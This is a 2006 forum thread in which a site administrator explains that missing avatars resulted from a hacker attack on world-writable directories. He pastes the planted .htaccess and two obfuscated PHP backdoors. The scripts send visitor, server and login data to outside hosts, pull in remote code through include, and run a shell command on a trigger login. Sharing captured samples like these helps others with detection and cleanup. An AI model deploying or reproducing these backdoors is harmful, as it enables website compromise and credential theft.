Forums avatar pictures gone?

Please discuss topics non-related to Delphi programming here.

Forums avatar pictures gone?

Postby HPW » December 5th, 2006, 6:24 am

The forum seems to have a problem with the avatar pictures?
:?:
Hans-Peter
HPW

Postby Kambiz » December 5th, 2006, 6:56 am

Thank you HPW, the problem is fixed now.

There was a hacker attack and some software had the ability to modify every single directory with 777 permissions on my all domains and subdomains.

I don't know what is the orgin of vulnerability. But I guess it's not because of my installed PHP scripts.

The exploit writes the following files on directories:

.htaccess
Code: Select all
Options -MultiViews
ErrorDocument 404 //galleries/Colored/63641.php

63641.php (random digits)
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>

configs.php (random name, exists in some of directories)
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Kambiz
Kambiz
Administrator
Administrator

Return to Miscellaneous